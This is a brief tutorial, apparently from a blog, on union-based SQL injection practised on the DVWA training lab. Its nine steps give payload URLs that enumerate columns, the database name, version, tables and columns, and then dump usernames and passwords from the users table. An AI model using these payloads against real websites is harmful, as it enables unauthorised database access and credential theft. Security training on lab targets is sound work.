Union Based Injection : Union based injection is an advance attack which targets the website's database unlike the front. Hand like bypass authentication method which we covered last time.
The idea is to fetch the username and password of the website from admin,user or this kind of table from the database and use these credentials to login in the website.
We can do whole process on DVWA
Steps Of Union Base Injection
Step 1: Find any GET Method in the Website.GET : .php?id=10 POST : .php
http://127.0.0.1/dvwa/dvwa/vulnerabilities/sqli/?id=10&Submit=Submit#Step 2: Check exception handling in the website.
http://127.0.0.1/dvwa/dvwa/vulnerabilities/sqli/?id=10&Submit=Submit#Step 3: Check total number of columns in the respective table.
http://127.0.0.1/dvwa/dvwa/vulnerabilities/sqli/?id=10' order by 1 --+Submit=Submit#Step 4: Select a vulnerable column from the table.
http://127.0.0.1/dvwa/dvwa/vulnerabilities/sqli/?id=1' union all select 1,2--+ &Submit=Submit#Step 5: Check the database name
http://127.0.0.1/dvwa/dvwa/vulnerabilities/sqli/?id=1' union all select database(),2--+ &Submit=Submit#Step 6: Check the Version of the database.
http://127.0.0.1/dvwa/dvwa/vulnerabilities/sqli/?id=1' union all select version(),2--+ &Submit=Submit#Step 7: Check the total number of tables in the database
http://127.0.0.1/dvwa/dvwa/vulnerabilities/sqli/?id=1' union all select 1,table_name from information_schema.tables --+ &Submit=Submit#Target Table : users
Step 8 : Get the columns of the tabel users
http://127.0.0.1/dvwa/dvwa/vulnerabilities/sqli/?id=1' union all select 1,column_name from information_schema.columns--+ &Submit=Submit#where table_name='users'--+ &Submit=Submit#
Target Columns : user and password
Step 9 : Get the content of the user and password
http://127.0.0.1/dvwa/dvwa/vulnerabilities/sqli/?id=1' union all select user,password from users--+
Post a Comment